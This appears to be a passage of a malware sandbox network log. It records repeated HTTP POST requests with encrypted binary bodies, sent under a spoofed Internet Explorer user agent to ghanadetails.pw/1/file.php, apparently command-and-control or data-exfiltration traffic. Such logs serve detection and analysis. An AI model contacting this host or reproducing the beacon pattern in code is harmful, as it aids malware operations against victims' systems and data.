  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

is\xc2Zx\xd9\x01\xee|Yu-\x85/A\xffloa]\x8f\xfa\x88xWsq}\x98a\xf5\xc9\x9cd\xae\x01*\xf7\x88,,\xcd
}\xe5\xd4\xed\x87\xdb\x93\xa2\x08UW\xf5x=\xb5\xad\x9b\x85\xaf\xed\x8f\x18\xd9\xa9\x95{\x1c\x94\xad{R\x0bz\x8a\\x06\xbb7\x1a\x17\xe7\xa5\xce\xef\xe0\xe2\xdaA34\xc3S`\x11\xf8>\xf5\x8a6S\\xf6l\x8a\x1d\xf5\x17\xbb\x08\xebly\x94\x15\x1a\xcc\xac\x14\xa7Q\x04\x1c\xcd\x8aJ0\xd1

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xbc\xda\xa1X\x83\x95\x80\xe5\xe4\xb9\xabpE\xee\xcb\xd8\x9f\xb0\x9c,\x9d\x1f\xfev6\xf7\xcfL=A\x07\x06\x8a\x0e\x0e\xc0\x12x\xca\xe4w\xee\x17\xe3\x8e8\x99\x08\xd5\x17<a\x00\x97\xf7F1o\x17\xeba\xce^\x01C\xfeD\x19\x0e\xde\x9b(m<[\xa9\xc4\x13\x02\x12JKd\x189\xa5\x17`
\xd0q\x8c\x1fm/!\x85\x10\x1c\xb60;\x93\x16/\xcd\x15\x01t\x97pnY\xf2\xc5\xa4R\xaa\xef\xf74b\xaet\xec\xbfi\x832\x9c\xd1,@\x05\xd3/\x9d\x9b\xba\xeb\xe9;

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xaas\xeb\xa2l_\xee*\xc7Z\x03\xf8\xa9E+\x01g\x81\x08\xea\xd2\x8c
^\xe8N\xc0tt\xda\xb2\x11\x94\xafL2\xf5\xba\xac#\\x05\xb7c^\xc3eMh\xf6)\xcb\x06\xe4\x91v<q\xf4t\x8f\xf2L\xb1\xe5\xe7\xbeSQ\xa4EW\xfeoC\x91\x98\x08R{\x02\xca@n\xc6\x86S\xf8c\xd9\xce\x04\xe6F*\x864\x1e\xf1\xebxVZ~\xab\x89\x1a.?\x9b7\x10\x06d\xf6\xc5\xbd\x99\xbb\x7fM|\x06\xeb\x02\x83{3\x94\x85;y\x07m\x1f\x07]\x91\xb1\xd8\xbd)N.u

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

x\x99\xe9\x12S\xa3qW\x87\xc3+\xe9\xf0\xa3\x8a</\xeb(?\x13\x86(M\x08\x1d\xae\xbdC\x13\x85\x07PSX\x94\xdcP%H
\x8a\x89d\x113\xd2f6\x8a\x1f\x08\xd1\xf8\xa5s\xca4\x8c\xab\xae-m\xb17
\xbc\xe3nX\xda*\xbe\xf6k\x80\xc1\xee\xf3FJ\xa0`\xbb\x07\x8cq\xeb\x83\x8a\xa0\xcd\xd1\x8f\x1d\x90\xf0\xe2\xe5MQ\xbc\xd3\x15\xfd\x06$)pk\x80;X\x18\xc0\x06j\x85\x8fz\xbb9~4#\Z3Fo9\xc98\x91\x80z\x1d\x08\x99\xc9\xe4\xcf\xef\x13=

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x8f\x13/\xd0rW\xa0\xdc&]\xa5\xc9\xe2\xf3\xf5\x17\x03\x0e \xedn
eT\xa3\xdfF\xf9\xd9\xe8\x12B\xe2\x9c\xdb\x13\xb8\xe1\xb1\x86\xeeQB\x01F&\xe8\x08_*R\x9f\xe96\xad/$\xb3!\xaaq\x93\xbf\xb1\xc0\x87z!O\xac\x0b\xa1\x1fh\xe5\xa0\xd3\xbe\x8cmfEhiz\x07<\xf2(HH\x89Kt\x8a\xd5B-f\xca5
G\xdb\x19\xdd\xefL'~\xbaU1\xb8\x8d\x91RK\x87&U\xbe\xd35\xfc\xe2\x883\xb1\xe5\xff\x0b\x19eQ\xf1\xbc\x96\x17\xe9\xf6\x9f\x908\x11

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

)\xeb,/\xc0\xbf\xfb@\xfdX\xaf\xaaTO\xbau\xe3\x9d\xcd!\x7f\xdc\x7f@\xba\x0cR\x10\xffz\xf0\xde\xc4\xe4Xl\x8a\x89j\x9a\xb5\xd4\xc8\xe2\xbd4w\x00\x12\x08\xeb\x81\xb9\xb5\xc6\x9ep?!\xe4\xf0\xa6\xfa\x8a]DB\xe5\xc6\x7fk\x06\xffV\xd4\xf8^9\xf84\xbd\xed\xbe\x9eP\xed\x1d\xdd
\xa0g[V\xddSrCr\xc2\x92 B\xbb\xe0e\x7fB\x886eR\x90v\x8c\xc7\xfa\xe09>\x91\xeb\xca`{}\xd7\xcd\x08,&\xc9\xd1\x83\xa9o\x0e\x02\xf7"\xb4t

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xb3\xba\xa5\x15\x0e\x96\xd8\xe5oV\x85m{?\x8b\xe1P^\xcd\xa6\x00R]n6u\xccW\xba*`\xfb{\x90\xf4sa\x85l\x1a\x02\xff\xc7\x00\xb7ac\xb1\x84\xee\xce#\xe3\x1e\xc1\x95\xd9c\x9a\x86\x90\xd3O\x8a\xc7\x15\xcb\xdf\x08VH\xa3mX\xfe?qI\xc9\xa0\x0e.\xbe\x19/c?\xf3\x86\xd9\xf9\x1c\x13\x8d\xc3W\xfc\x06n\x8d\xcbN\xbd`\xd2TMj<0F!\xe0j\xe2X\xba\x929\x9aB\x96\xdb\x19\x1d\xa2x\x08\xb6w@\xebM\x80L\xab\x90\xf9\x08s[

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xbb\xba\x00w\xa0\xdfv\xb3\xa0\xe1c\xf8o\xd6]\x1f\xaa\xd4\xc1'9\xe9\xf3\xd6\xb7\xcb9\xb9%\x12!\xc1I\xaak+\xf5\xf6\xf8v\xf7r\x1b\xaf\x99\xb2\x8fuD^\xf8\x98\xe0\x9fU\x17b\xe7UR5\xd14\x8a\xcf\x15n\xbd\xa6\x1f\xe6\xf5\xa2\xef\x18\xaae\xa0\x1f^\xf4\xa4\xb2\x98\x16\xd8\x91K\x07g\x0c\xf2\x8c\xb5\x82m\xce<\xf1\xd5_=)\x0c'\xd9\x91\xc5\x12\xe3\xaa\xe5 \xda\xd4\xe3\xb9\x13\xad\x18\xf9\x12\x14\xcd\xb8\xa0\x03\x08\xbew\xe5\x89\xe3\xc9\xe2\xfd_N\xee\xe6O

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x94!\x99\x99\xa7\xbc\xda\xcb\x15s<\xef\x9e\x00xOp\xab\xd4\xa4|\xf9\xd2o\x08Tw\xe7#/\xd0\xe1I\x1e\xdd\xea\xdd\xba{!m\xcfk\x97\xd6\xd3\xfc\x1f\xef\x7f?\xd9\x8e|\x87GJ\xba\x83)\x16\xc9\xe0\x8f\xe5\x8b\xf2V\xa4yO\x88\x12xB\xb8\x91s?\x0b+\xde\xa2\x1eV\xcd\xb5\xf7\xbd\xfdG\xa9\x8f\x8dvH\xc4\x82M\x1e}{\xa0Q\xb7n\xeb\xf7\xc6\x10\xaa\x90\xdf\x80\xe4E\xce1\xbe\x93c\xa8\x7f\xb6\x8f\xab\x87J\xcd\x83

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xd9)rZ3~\xafv\x97\xeb\xae6N\xb2Wt$3X&B \x83\x9av\xd0#\xb3&\xd2\xd8\xf3\x16\x04$;[j\x1c\x8e\xfdE\xeb\\x14s\xc16\xa9\xf5\xa1I\xa2\xb7\xc4\xa0&,\xc5o\x01&\xfa\x8f\xa8\x83\x19\x950\xbb:5\x90\xe0\xd0aA\xc1\x100\x7fF.\x9ch\x14\xe4\x02\xc3y\x13\xfd\x8ap~Z\x9b\x98\xb4\xcf\xfb\xab\xc7\xfe'\xe4k<\x04\xb0\x97\xb9\x99
z\xd5\xe2\xfa\xfdt\x0f>9\xf0\x98D\x9dJ\x80\x8b

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xce\xac|\xbc^\x80\xb4\xb09Cs\xae\x87\x86\xfa!\x07+\xca`\xb9\xe2\xc5\xe6<\xe5\xccw\xa4\xa6N\x9ah\xe8C\xb4_\xfdn!:\x84_\xad\xb4.\x05
\xe3\x84Zf0\x1c\xeb\xb5\x05pC\xc2\xea;\x05\x8f\xbf\x06\x17s]E!\xf3>H
\xf9\x88\xf5\xbde\^\xbc\xda\x93\xd6\xa2~\x89L\xfc9\x08\x04\xe83\xe5t\xd3@\xff<\xb5Q\xe0%\xdf\xcd\xa4\xedS\x85\xd3{\x81\xfapQ\xd2a,b\xbf]sYbJ\x97\x0e

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

k\xaf\xb5\xbd\x81Z\x8d5L\x1bo\xc4\xe6w\xeaK\x9a\xcfJ\x03C\xde\x96\x9b+\xf1\xb2\x00\x0f\xa6\xe0\xce\x95\xb3\xd2\xed\xd8\x7f\x0f\xfc\x17\x84\x1b\x9f\xe5ipS\x18\xa0"\x86\x16\x9eWc\xe4\xa1\xa2o\x9b\xe1q\x01\x94\x8bP\xfc\x0c\x11\x96\xf8\xc5\x9e\x9f\x1dg\x8a#\x81O4\xb27\xe7d\x7f\x8d\x10\xd6\x0c\xc0-\x8a\xc8\xe9\x9a\xad\xc0\x9b\xfa<V\x0eO\xa7\x19}\x1f\xc6\x995\x94E\xdbCD\xa3O\xd2\xe1\xac\x1b\xf0\x16\x90F\x83\xe5\xe9\xc5\xc9B\xca\xde\xff59~_J\xa2

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

T\x84\xc0\xd7'T\x9e\xea\xbb\xf6\x1c\x99\x1a\x82\xec\xcb\xcc)\xd5[\xc51\x13\xe8>2\x0e\xf4\xb8W<\xc5\xa1\x93\xac\x8cuz\x17(\xebbc\xc9\x12\x97}\xd8EM\xb6\xd5\x9bz\xd9\x1b\xfai\x15\x90'\x1b\xa6\x01\xab\xa0%\x96\xaa\x1f\x85'2s\xec@\x9b\x7f%\x01\x19\xd2-oa\x8b\xfa\xfe\x05\x15\xb04\x9a{\x14\xe2\xae\x8d\xbe\xfaW9N\xda\xb3Aa+\xe88\x94\xbe\xc9\xa8O\x10\xc9G\xc1\xaa\xffd\xac\x0f\xaaj\x91\x83\xda\xc2\xb0\xa3\xe4\xc4\xcd \xc2\xd4
\x02\xb6W

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x9c!\xa9p\xd3\xca\x04\x1f\xda\xceoW\xb5~\xb5\x99\x17\xec\xab\x9c\xb5\xfe\xa4\xd3T\x15M\x03\xfdgS}\xd1\x8e}\x939\5e2\xe2\xa8\xbf\x05\xd3\x9c2&0p\xaaS
\xd6\x98(\xf6\xee\xdf\xda\x93q\x01c\x05L1^\x81\x1f\xd2SK\x9f\x8e4\x83|S\xc2\x17S\xa8\x11DM\xc5o2\xf3\xc3\xdfK{Z\xde\x90o\xe5\x1b\x1fl\x97j\xc1\xaa]\xff|uT\xaa\xd5\x89o\x010\xce)-\xfbW@W\xe2F\x83\x12g\xd9\x04\x10ZW\xd5\xa3\xec~\xcc\x19\xab

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xd9V\x80\x9c\xfe>\xfcs\xf3\x93\xefZ\xe3\\xc0\x85X\xc32\xc3\x98\x9e%u\xce\xa6\x93\xe4\x85J!\xde(E\xe8\xc3\xa8\x14q\xb5\xa7\x03\x94\x0e\xdb\x15A\x06\x98{\xdc-\x839q\x92\xd5Vh+\xb1\xad\x10\xb1\x96\xc2\xd5m\xc3\xc5W\x0e\xca\xa6\xaf3\xd2\x11\xb9\xff=\x88zG\x8c\x94|\xd3E1\x9d\x94\x17\xd6\xb9I\x88\xf4U\x1a%\xf8\x87\xe8P\x8f9C\xbaM\x13[\xf6\xe9\x03#8D[\x9b\xa4[\x9a\xb4<\xdc'3\xe7\xa0PG\x95\x0c
^iX]z\xf70\xa5\xaaJ

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xa6\xf7\xb5!\xfe\xd5\x16m\xae,n\xdb\xd9@\x92\xe2R\xe8\x9b\xcd\xee\x10\xc0\x88t\xc1\xdaV\x85\x93\x07\xebb\xd1\xe8K\x9d\xca\xae\x9e\xcf\x89 \xba\xd4<&T\xa7e@\x16\xc0\x82\xa1ZZ\x04\x14\xac\x84A\x03\xb1\xe9c\xe0\xd0\xc3.\xbd\x10\x97\x19.\xb2\xe8
\xeb\x987\xa3\xd3I\xfa\x1a\x99.\xffV\xd4&\x17\x0f\x9f|\xc2`U\x92\x10&X\xc38\x05\x8d\xf7\xb5dt	\xc9\xf7\x9f\x18{\xff\x8bS+	\xe63	043\x98\x01e\xfa\x95\xe7\xe7@4\xe7\xdc\xfb\xcd,\xf7\xcd@

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

;_<\xf1\x8fw3k\xae\xd9\x02\xe1\x07<qyo\xfa\x06x\xf1X\xccA\xfc\xc1\x16\xc5\x90\x15\xdaeq\xf7\xef\x15b\xe6\x05\x16A\xf2\xc2\x0e\x84\xceKA\x14\xf9S-QD#\x1d\\x8aV\xb1\x1fIP\xb1t\xcbi\x00\xb2\x8c\x98\x16\x97\xecB\x886q\x08\x03
\xb1N\xfc\xe5R\x95\xe7wV\x18\xb5\x02\x89B\xf2\xd1FR\xcc\xef
\xf3K\xb6~oC\xe5\x96\x19\x1czk\x8c#\xea9	\x14-\x87\xa4.\x928g3\x05\xa9\xec*\xe4E\xc2F4\x12\xb0\xc1\x13P\x14V}

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xf8\xd3>\x939\x1e\x84\xf7j(H\xfc\x8f\xfd\xed\x9f\xd1>\xe2]\xd0A6\xe4\x89:\xc8\xad\xd9\xe4#\x9dV\x9f	\x930kVna\xe7l\xf7%\xc5c\xa9c\xe8\x87\xbeUk\xccy\x00J\xf8\x1a\x95{j\x8a\x8c|PY?\xde\x14\xb1h&3\xae\x85\x8b\xaf\xde\x8fN\x91\xe2\xffpTy9\x96\xfd\xe6pC\x801\xd1	\x93m\x9a\xa0\x87\x14\xb1L\xe6\x9d\xae\x94F9\x07l\xab\xc5\x0c\xe74v\x9b\xbf\xb9\x85\x18
]\x08\xfd\x1e\xdbmz\x08\x10\xb9\x95\x87\xc5\xe2\xaf

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xbd\x05\xca\x7f9l\xc5\x8eh@\xde\xa9\x8e1\xb0\x90z\x0b\xb6\xbb\xc3\xe4`\x8bD\xf9o@
\x85\xd0 \xae\xf4@\xc2\x8d\xa4\xaa\xaa\xde2G\x1f\x99\xb4\x83\x1bu`n\xe5\xfbs'\xabp4\xe2J\xfb\xa7$\x8a\xc9\xaa\xa4\xb5?\xacU\xc8jN\xa5\xfb\x84G\xf2\xd1${\xc5\x04\xec\xd5\x02\x16\xf4UZ\x0b\xa3"s\x8c)b\xda<'o{\xd0\x0e\x99\xcdu\x12\xe5\xa6\x8b\x11\xe4B\x9e\xa2\xff\xdf\xa4\xeb\xc1\xa3\xd5v\xd6\x13\x08\xb8\xc8/\x81zzQ\xc0\x97\xefS\xb7\xae

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xc5\xa0mk\x87\xaco\x8e\xb1/\x1c\xbcf\x8e\xea\x01\x992\xd6\xb8/V\x93\x8bd\xbe6\x19\xa3\xe0\xe3\xb7A\xc6pA\xa4\xf3\x97=\x90\xca\x12\x9d\xe6\x9cN\x1d\x01\xce\x99q\x80VC<\xc7\xe4,\x84\xc5U\x80\x8a\xb1\x0f\x03\xa1\x81l\xff\xc8\xb3!g\xeel\xf8\xa8@\xc7B\xa5\x07\x00g\xf1\x16\xd4\x12\x03R
G@\x1b\xc6P\xea\xbf\x0e8FG@a\x98\xf7m\xcdk\x8deJ\xb5
\xd9\xda\xbb3\\x11m\x1bH$\xb7\x08\xc0m\x88\x95\xc4\xba\xfb\xc0N\x80\x91\xa2F

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xa7\xfb!`\xfc%\xee\xe9z\x01\xb3\xed\x97e\xc48\x03\xa0_\x8c\x03\x07\xd4\xf1\x94S%$-\xf1\xdf\xddF\xf8Y/\xba\x1fs?>\x81\xd8\xa9\xe3\x8a|T\xa0H\x88\xcd\xcd\xbe\xbd\xe5\xea\x81\xed\xd6$+\xd3\x8f\xd6QJ\xaf\xff\xe0{\xaa}
\xcd\xba\x98\x16\x83|X\xd5)6)3\xb3i!\xfa\x15j\x81Syt\xcbd\xc9\xdb\x1a\xde\xa8O\xe4 X\xc9\xf3I*\xdb\x90\xb7SQ\x8d\xf3\x841\xc3\x93\x11I\xbdI\xb4J\xfeY

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xf4H\x1d0\xfb\x10\xcb\x11\xbf\xec\x939v\xc8\xdc\x03>\xe8\x04\xac\xfa

\xae\xf5\xb50\x1d\xdey\xc6\x1b\xd3\x8d\xa3\xb9{\xec\x90\x01=\xaa>\xbb\xc4\xe1\xa2\xa9[\xc6\x15+\xf2u\xa5|M\xa1>)\x11e\x0c\x8f\x85\xe2v\xff\xf8\xd5^R\xb8\xe7\xedny\xbb\x9bGe\x9dr\x16\xd0>m6@\x1c\x00Sr\xdb`\xb2^\x113M\xdb-Kq\xe7\x0b\xbe\xdb\xd4"\xf4&k9\xce\xb7\xb28\x9c\xa8d\xb3\xc2\xb6\x88\x07kJ\xad\xea

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x190\xac6M\xa4\xd1\xb2w\x84oH\x80gD\xde+$\xa6&\xc5\\x1bl\x127h\xe3\x0b\xde\xda\xff\xda\x11\xf6[)\xbcnF\x11&&.\xd6\xaa\xde\x90\xaa\xeeSE)\xc7PZN\xc7\x823 &\xf4\x8fh\x9a\xc7\xf9NaD\xf1p\x8f\x11\x1f\x8f\x14\x03\x9apQ\xd0\x9c\xefh|\xf4\xa7\x9eX\xad\xa7||VW\x8df\xaf\x89}\xb56\xcb\x87\xa6N\xc6i\x88\x1f\x9a\x11\x88\xd9i\x8ai\x8eg\xd5~\xac\xb9D\x93J@\x92

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

